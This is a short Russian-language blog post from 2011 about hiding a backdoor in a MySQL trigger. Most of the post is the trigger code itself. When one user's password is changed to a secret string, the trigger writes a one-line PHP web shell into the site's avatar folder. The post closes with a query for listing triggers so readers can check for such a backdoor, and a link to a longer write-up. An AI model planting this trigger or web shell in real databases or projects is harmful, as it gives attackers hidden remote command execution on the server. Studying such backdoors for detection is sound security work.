Бэкдор с триггерах субд О_о

августа 29, 2011

ацкая штука:

delimiter |
CREATE TRIGGER backdoor AFTER UPDATE ON users
FOR EACH ROW label:BEGIN
IF (SELECT password FROM users WHERE id=123)='gimme_that_shell' THEN
SELECT '<?=`$c`?>' INTO OUTFILE '/home/site/httpdocs/avators/smile.php';
ELSE
LEAVE label;
END IF;
END;

Срочно делайте:

SELECT * FROM information_schema.TRIGGERS

=)

подробнее http://raz0r.name/mysli/backdoor-in-trigger/

2 комментария для “Бэкдор с триггерах субд О_о”


Оставить комментарий

© 2010 - 2019 Ядоблог. Ничего не защищено.
Powered by Лаборатория Яда. Написать Яду